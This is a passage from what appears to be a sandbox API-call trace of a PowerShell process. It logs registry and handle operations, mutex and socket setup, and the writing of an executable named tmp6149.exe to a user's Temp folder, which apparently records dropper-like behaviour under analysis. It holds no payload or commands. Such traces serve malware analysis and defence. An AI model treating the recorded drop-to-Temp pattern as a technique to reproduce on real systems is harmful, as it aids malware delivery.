(hObject=0x13) returned 1 [0056.312] CloseHandle (hObject=0xf) returned 1 [0056.312] RegCloseKey (hKey=0x310) returned 0x0 [0056.313] RegCloseKey (hKey=0x30c) returned 0x0 [0056.313] RegCloseKey (hKey=0x308) returned 0x0 [0056.313] LocalFree (hMem=0x283f90) returned 0x0 [0056.313] RegCloseKey (hKey=0x328) returned 0x0 [0057.795] RegCloseKey (hKey=0x394) returned 0x0 [0057.795] RegCloseKey (hKey=0x374) returned 0x0 [0057.796] CloseHandle (hObject=0x41c) returned 1 [0057.796] CloseHandle (hObject=0x408) returned 1 [0057.796] RegCloseKey (hKey=0x38c) returned 0x0 [0057.796] RegCloseKey (hKey=0x388) returned 0x0 [0057.796] RegCloseKey (hKey=0x384) returned 0x0 [0057.797] RegCloseKey (hKey=0x380) returned 0x0 [0057.797] RegCloseKey (hKey=0x37c) returned 0x0 [0057.797] RegCloseKey (hKey=0x378) returned 0x0 [0057.797] RegCloseKey (hKey=0x354) returned 0x0 [0057.798] RegCloseKey (hKey=0x370) returned 0x0 [0057.798] RegCloseKey (hKey=0x36c) returned 0x0 [0057.798] RegCloseKey (hKey=0x368) returned 0x0 [0057.798] RegCloseKey (hKey=0x364) returned 0x0 [0057.798] RegCloseKey (hKey=0x360) returned 0x0 [0057.799] RegCloseKey (hKey=0x35c) returned 0x0 [0057.799] RegCloseKey (hKey=0x358) returned 0x0 [0057.799] CloseHandle (hObject=0x40c) returned 1 [0057.799] RegCloseKey (hKey=0x348) returned 0x0 [0057.799] RegCloseKey (hKey=0x344) returned 0x0 [0057.800] RegCloseKey (hKey=0x340) returned 0x0 [0057.800] RegCloseKey (hKey=0x33c) returned 0x0 [0057.800] RegCloseKey (hKey=0x338) returned 0x0 [0057.800] RegCloseKey (hKey=0x334) returned 0x0 [0057.800] RegCloseKey (hKey=0x330) returned 0x0 [0057.801] RegCloseKey (hKey=0x310) returned 0x0 [0057.801] RegCloseKey (hKey=0x30c) returned 0x0 [0057.801] CloseHandle (hObject=0x418) returned 1 [0057.801] CloseHandle (hObject=0x404) returned 1 [0057.801] RegCloseKey (hKey=0x3e8) returned 0x0 [0057.802] CloseHandle (hObject=0x414) returned 1 [0057.802] CloseHandle (hObject=0x420) returned 1 [0057.802] CloseHandle (hObject=0x410) returned 1 [0057.802] RegCloseKey (hKey=0x3a8) returned 0x0 [0057.803] RegCloseKey (hKey=0x3a4) returned 0x0 [0057.803] RegCloseKey (hKey=0x3a0) returned 0x0 [0104.404] LocalFree (hMem=0x32ab10) returned 0x0 [0104.405] LocalFree (hMem=0x32aa00) returned 0x0 [0104.406] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x344e2e0, cbSid=0x1b48eaf0 | out: pSid=0x344e2e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b48eaf0) returned 1 [0104.407] CreateMutexW (lpMutexAttributes=0x344e498, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x5cc [0104.407] WaitForSingleObject (hHandle=0x5cc, dwMilliseconds=0x1f4) returned 0x0 [0104.407] ReleaseMutex (hMutex=0x5cc) returned 1 [0104.407] CloseHandle (hObject=0x5cc) returned 1 [0104.407] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x344e7f0, cbSid=0x1b48eaf0 | out: pSid=0x344e7f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b48eaf0) returned 1 [0104.408] CreateMutexW (lpMutexAttributes=0x344e9a8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x5cc [0104.408] WaitForSingleObject (hHandle=0x5cc, dwMilliseconds=0x1f4) returned 0x0 [0104.408] ReleaseMutex (hMutex=0x5cc) returned 1 [0104.408] CloseHandle (hObject=0x5cc) returned 1 [0104.408] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x344ed00, cbSid=0x1b48eaf0 | out: pSid=0x344ed00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b48eaf0) returned 1 [0104.408] CreateMutexW (lpMutexAttributes=0x344eeb8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x5cc [0104.408] WaitForSingleObject (hHandle=0x5cc, dwMilliseconds=0x1f4) returned 0x0 [0104.408] ReleaseMutex (hMutex=0x5cc) returned 1 [0104.408] CloseHandle (hObject=0x5cc) returned 1 [0104.409] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x344f210, cbSid=0x1b48eaf0 | out: pSid=0x344f210*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b48eaf0) returned 1 [0104.409] CreateMutexW (lpMutexAttributes=0x344f3c8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x5cc [0104.409] WaitForSingleObject (hHandle=0x5cc, dwMilliseconds=0x1f4) returned 0x0 [0104.409] ReleaseMutex (hMutex=0x5cc) returned 1 [0104.409] CloseHandle (hObject=0x5cc) returned 1 [0104.409] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x344f720, cbSid=0x1b48eb20 | out: pSid=0x344f720*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b48eb20) returned 1 [0104.409] CreateMutexW (lpMutexAttributes=0x344f8d8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x5cc [0104.409] WaitForSingleObject (hHandle=0x5cc, dwMilliseconds=0x1f4) returned 0x0 [0104.409] ReleaseMutex (hMutex=0x5cc) returned 1 [0104.409] CloseHandle (hObject=0x5cc) returned 1 [0104.434] DeregisterEventSource (hEventLog=0x1b880008) returned 1 [0104.438] setsockopt (s=0x4e0, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0104.438] closesocket (s=0x4e0) returned 0 [0104.443] CloseHandle (hObject=0x55c) returned 1 [0104.444] UnmapViewOfFile (lpBaseAddress=0x1b3f0000) returned 1 [0104.445] CloseHandle (hObject=0x354) returned 1 [0104.445] CloseHandle (hObject=0x554) returned 1 [0104.445] CloseHandle (hObject=0x544) returned 1 [0104.445] CloseHandle (hObject=0x36c) returned 1 [0104.446] CloseHandle (hObject=0x368) returned 1 [0104.446] CloseHandle (hObject=0x420) returned 1 [0104.446] CloseHandle (hObject=0x410) returned 1 [0104.447] CloseHandle (hObject=0x3a8) returned 1 [0104.447] CloseHandle (hObject=0x3a4) returned 1 [0104.448] CloseHandle (hObject=0x3a0) returned 1 [0104.448] CloseHandle (hObject=0x54c) returned 1 [0104.448] CloseHandle (hObject=0x550) returned 1 [0104.448] CloseHandle (hObject=0x588) returned 1 [0104.449] CloseHandle (hObject=0x58c) returned 1 [0104.449] CloseHandle (hObject=0x4f0) returned 1 [0104.449] CloseHandle (hObject=0x4d8) returned 1 [0104.449] CloseHandle (hObject=0x4d4) returned 1 [0104.450] CloseHandle (hObject=0x364) returned 1 [0104.450] CloseHandle (hObject=0x348) returned 1 [0104.450] CloseHandle (hObject=0x340) returned 1 [0104.450] CloseHandle (hObject=0x33c) returned 1 [0104.451] CloseHandle (hObject=0x5b4) returned 1 [0104.451] setsockopt (s=0x4c4, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0104.451] closesocket (s=0x4c4) returned 0 [0104.452] CloseHandle (hObject=0x4c8) returned 1 [0104.452] setsockopt (s=0x4bc, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0104.452] closesocket (s=0x4bc) returned 0 [0104.452] CloseHandle (hObject=0x4c0) returned 1 [0104.452] CloseHandle (hObject=0x4b0) returned 1 [0104.453] CloseHandle (hObject=0x4b8) returned 1 [0104.453] CloseHandle (hObject=0x454) returned 1 [0104.454] CloseHandle (hObject=0x450) returned 1 [0104.454] CloseHandle (hObject=0x43c) returned 1 [0104.454] CloseHandle (hObject=0x3e4) returned 1 [0104.454] CloseHandle (hObject=0x438) returned 1 [0104.455] CloseHandle (hObject=0x3e0) returned 1 [0104.455] CloseHandle (hObject=0x3dc) returned 1 [0104.455] CloseHandle (hObject=0x3d8) returned 1 [0104.455] CloseHandle (hObject=0x3d4) returned 1 [0104.455] CloseHandle (hObject=0x3d0) returned 1 [0104.456] CloseHandle (hObject=0x3cc) returned 1 [0104.456] CloseHandle (hObject=0x3c8) returned 1 [0104.456] CloseHandle (hObject=0x3c4) returned 1 [0104.456] CloseHandle (hObject=0x3c0) returned 1 [0104.456] CloseHandle (hObject=0x3bc) returned 1 [0104.457] CloseHandle (hObject=0x3b4) returned 1 [0104.457] CloseHandle (hObject=0x3b8) returned 1 [0104.457] RegCloseKey (hKey=0x434) returned 0x0 [0104.457] CloseHandle (hObject=0x430) returned 1 [0104.457] RegCloseKey (hKey=0x42c) returned 0x0 [0104.458] CloseHandle (hObject=0x428) returned 1 [0104.458] RegCloseKey (hKey=0x424) returned 0x0 [0104.458] RegCloseKey (hKey=0x394) returned 0x0 [0104.458] CloseHandle (hObject=0x384) returned 1 [0104.459] setsockopt (s=0x37c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0104.459] closesocket (s=0x37c) returned 0 [0104.459] CloseHandle (hObject=0x380) returned 1 [0104.460] setsockopt (s=0x370, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0104.460] closesocket (s=0x370) returned 0 [0104.460] CloseHandle (hObject=0x378) returned 1 [0104.461] CloseHandle (hObject=0x32c) returned 1 [0104.461] RegCloseKey (hKey=0x570) returned 0x0 [0104.461] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0104.461] CloseHandle (hObject=0x2f0) returned 1 [0104.461] CloseHandle (hObject=0x320) returned 1 [0104.462] UnmapViewOfFile (lpBaseAddress=0x2810000) returned 1 [0104.462] CloseHandle (hObject=0x5a8) returned 1 Thread: id = 42 os_tid = 0xaa8 [0057.085] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0057.088] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409 [0057.092] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.092] CoTaskMemFree (pv=0x32ac20) [0057.093] VirtualQuery (in: lpAddress=0x1c68d7e0, lpBuffer=0x1c68e6a0, dwLength=0x30 | out: lpBuffer=0x1c68e6a0*(BaseAddress=0x1c68d000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0057.100] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.100] CoTaskMemFree (pv=0x32ac20) [0057.102] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.102] CoTaskMemFree (pv=0x32ac20) [0057.105] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.105] CoTaskMemFree (pv=0x32ac20) [0057.111] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.112] CoTaskMemFree (pv=0x32ac20) [0057.113] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.113] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.113] CoTaskMemFree (pv=0x32ac20) [0057.115] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.115] CoTaskMemFree (pv=0x32ac20) [0057.118] VirtualQuery (in: lpAddress=0x1c68da90, lpBuffer=0x1c68e950, dwLength=0x30 | out: lpBuffer=0x1c68e950*(BaseAddress=0x1c68d000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0057.119] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.119] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.119] CoTaskMemFree (pv=0x32ac20) [0057.121] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.121] CoTaskMemFree (pv=0x32ac20) [0057.121] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.121] CoTaskMemFree (pv=0x32ac20) [0057.124] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.124] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.124] CoTaskMemFree (pv=0x32ac20) [0057.128] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.128] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.128] CoTaskMemFree (pv=0x32ac20) [0057.169] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.169] CoTaskMemFree (pv=0x32ac20) [0057.171] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.171] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.171] CoTaskMemFree (pv=0x32ac20) [0057.172] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.172] CoTaskMemFree (pv=0x32ac20) [0057.174] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.174] CoTaskMemFree (pv=0x32ac20) [0057.175] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.175] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.175] CoTaskMemFree (pv=0x32ac20) [0057.177] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.177] CoTaskMemFree (pv=0x32ac20) [0057.178] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.178] CoTaskMemFree (pv=0x32ac20) [0057.193] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.193] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.193] CoTaskMemFree (pv=0x32ac20) [0057.222] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.222] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.223] CoTaskMemFree (pv=0x32ac20) [0057.271] CoTaskMemAlloc (cb=0x104) returned 0x32ac20 [0057.271] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32ac20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.271] CoTaskMemFree (pv=0x32ac20) [0057.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c68c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0057.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c68c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0057.686] CoTaskMemAlloc (cb=0x20c) returned 0x1b786d50 [0057.687] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b786d50, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0057.687] CoTaskMemFree (pv=0x1b786d50) [0057.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c68c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0057.697] GetCurrentProcess () returned 0xffffffffffffffff [0057.697] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c958 | out: TokenHandle=0x1c68c958*=0x404) returned 1 [0057.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c68c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30 [0057.706] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c68ca00 | out: lpFileInformation=0x1c68ca00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x3f871a3e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0057.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c68c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0057.708] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c68c9b0 | out: lpFileInformation=0x1c68c9b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x3f871a3e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0057.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c68c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0057.709] SetErrorMode (uMode=0x1) returned 0x1 [0057.709] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x40c [0057.709] GetFileType (hFile=0x40c) returned 0x1 [0057.709] SetErrorMode (uMode=0x1) returned 0x1 [0057.709] GetFileType (hFile=0x40c) returned 0x1 [0057.711] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x1c68c9a8 | out: lpFileSizeHigh=0x1c68c9a8*=0x0) returned 0x65b3 [0057.711] ReadFile (in: hFile=0x40c, lpBuffer=0x404c270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c68c8c8, lpOverlapped=0x0 | out: lpBuffer=0x404c270*, lpNumberOfBytesRead=0x1c68c8c8*=0x1000, lpOverlapped=0x0) returned 1 [0057.723] ReadFile (in: hFile=0x40c, lpBuffer=0x404c270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c68c5a8, lpOverlapped=0x0 | out: lpBuffer=0x404c270*, lpNumberOfBytesRead=0x1c68c5a8*=0x1000, lpOverlapped=0x0) returned 1 [0057.724] ReadFile (in: hFile=0x40c, lpBuffer=0x404c270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c68c3f8, lpOverlapped=0x0 | out: lpBuffer=0x404c270*, lpNumberOfBytesRead=0x1c68c3f8*=0x1000, lpOverlapped=0x0) returned 1 [0057.724] ReadFile (in: hFile=0x40c, lpBuffer=0x404c270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c68c3f8, lpOverlapped=0x0 | out: lpBuffer=0x404c270*, lpNumberOfBytesRead=0x1c68c3f8*=0x1000, lpOverlapped=0x0) returned 1 [0057.724] ReadFile (in: hFile=0x40c, lpBuffer=0x404c270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c68c3f8, lpOverlapped=0x0 | out: lpBuffer=0x404c270*, lpNumberOfBytesRead=0x1c68c3f8*=0x1000, lpOverlapped=0x0) returned 1 [0057.727] CloseHandle (hObject=0x40c) returned 1 [0057.728] GetCurrentProcess () returned 0xffffffffffffffff [0057.728] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68cbb8 | out: TokenHandle=0x1c68cbb8*=0x40c) returned 1 [0057.729] GetCurrentProcess () returned 0xffffffffffffffff [0057.729] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68cbb8 | out: TokenHandle=0x1c68cbb8*=0x408) returned 1 [0057.730] GetCurrentProcess () returned 0xffffffffffffffff [0057.730] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c958 | out: TokenHandle=0x1c68c958*=0x410) returned 1 [0057.731] GetCurrentProcess () returned 0xffffffffffffffff [0057.731] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68cbb8 | out: TokenHandle=0x1c68cbb8*=0x414) returned 1 [0057.731] GetCurrentProcess () returned 0xffffffffffffffff [0057.731] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68cbb8 | out: TokenHandle=0x1c68cbb8*=0x418) returned 1 [0057.736] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c838 | out: TokenHandle=0x1c68c838*=0x41c) returned 1 [0057.746] GetCurrentProcess () returned 0xffffffffffffffff [0057.746] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c838 | out: TokenHandle=0x1c68c838*=0x420) returned 1 [0057.804] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe", nBufferLength=0x105, lpBuffer=0x1c68cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe", lpFilePart=0x0) returned 0x30 [0057.804] SetErrorMode (uMode=0x1) returned 0x1 [0057.804] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp6149.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x308 [0057.805] GetFileType (hFile=0x308) returned 0x1 [0057.805] SetErrorMode (uMode=0x1) returned 0x1 [0057.805] GetFileType (hFile=0x308) returned 0x1 [0057.806] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398 [0057.806] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x39c [0057.818] GetCurrentProcess () returned 0xffffffffffffffff [0057.818] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c898 | out: TokenHandle=0x1c68c898*=0x3a0) returned 1 [0057.824] GetCurrentProcess () returned 0xffffffffffffffff [0057.825] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c898 | out: TokenHandle=0x1c68c898*=0x3a4) returned 1 [0057.845] GetCurrentProcess () returned 0xffffffffffffffff [0057.845] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c7d8 | out: TokenHandle=0x1c68c7d8*=0x3a8) returned 1 [0057.849] GetCurrentProcess () returned 0xffffffffffffffff [0057.849] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c7d8 | out: TokenHandle=0x1c68c7d8*=0x410) returned 1 [0057.853] GetCurrentProcess () returned 0xffffffffffffffff [0057.853] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68ce18 | out: TokenHandle=0x1c68ce18*=0x420) returned 1 [0057.863] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c68aed8 | out: phkResult=0x1c68aed8*=0x414) returned 0x0 [0057.863] RegQueryValueExW (in: hKey=0x414, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c68ae5c, lpData=0x0, lpcbData=0x1c68ae58*=0x0 | out: lpType=0x1c68ae5c*=0x1, lpData=0x0, lpcbData=0x1c68ae58*=0xe) returned 0x0 [0057.863] CoTaskMemAlloc (cb=0x12) returned 0x1b7c1470 [0057.863] RegQueryValueExW (in: hKey=0x414, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c68ae2c, lpData=0x1b7c1470, lpcbData=0x1c68ae28*=0xe | out: lpType=0x1c68ae2c*=0x1, lpData="Client", lpcbData=0x1c68ae28*=0xe) returned 0x0 [0057.864] CoTaskMemFree (pv=0x1b7c1470) [0057.864] RegCloseKey (hKey=0x414) returned 0x0 [0057.872] CoTaskMemAlloc (cb=0xcd0) returned 0x1b7c5440 [0057.872] RasEnumConnectionsW (in: param_1=0x1b7c5440, param_2=0x1c68ce6c, param_3=0x1c68ce68 | out: param_1=0x1b7c5440, param_2=0x1c68ce6c, param_3=0x1c68ce68) returned 0x0 [0057.876] CoTaskMemFree (pv=0x1b7c5440) [0057.882] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c68cc78 | out: lpWSAData=0x1c68cc78) returned 0 [0057.889] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x368 [0057.893] setsockopt (s=0x368, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0057.893] closesocket (s=0x368) returned 0 [0057.893] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x368 [0057.895] setsockopt (s=0x368, level=65535, optname=128, optval="\x01", optlen=4) 